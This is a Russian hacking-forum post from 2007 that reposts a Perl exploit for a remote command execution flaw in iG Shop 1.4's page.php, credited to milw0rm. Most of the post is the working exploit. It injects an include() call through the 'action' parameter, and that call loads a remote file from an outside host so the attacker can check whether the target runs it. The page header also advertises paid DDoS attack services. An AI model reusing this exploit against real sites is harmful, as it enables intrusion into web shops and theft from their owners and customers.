Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


iG Shop 1.4 - удаленное выполение команд

Автор aka PSIH , 18 Jun 2007 15:41

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aka PSIH
Отправлено 18 June 2007 - 15:41

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
iG Shop 1.4 eval Inclusion Vulnerability
]]>скачать]]>

exp(perl):
#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
#iG Shop 1.4 eval Inclusion Vulnerability
#found by IFX #nyubicrew
#Vulnerability on page.php
#if (!$action)
#	$action = "make";
#// here the function will be called.
#eval ("page_$action();");
####################################################################
die "Example: perl $0 http://www.xxx.co.uk/shop\n" unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";

$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;

if ($respone =~ /nyelipin file;P/i){
	print "\nTembus...\n";
	print "\n$url\n";
}
else{
print "\nGagal cok...\n";
}
(с)milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости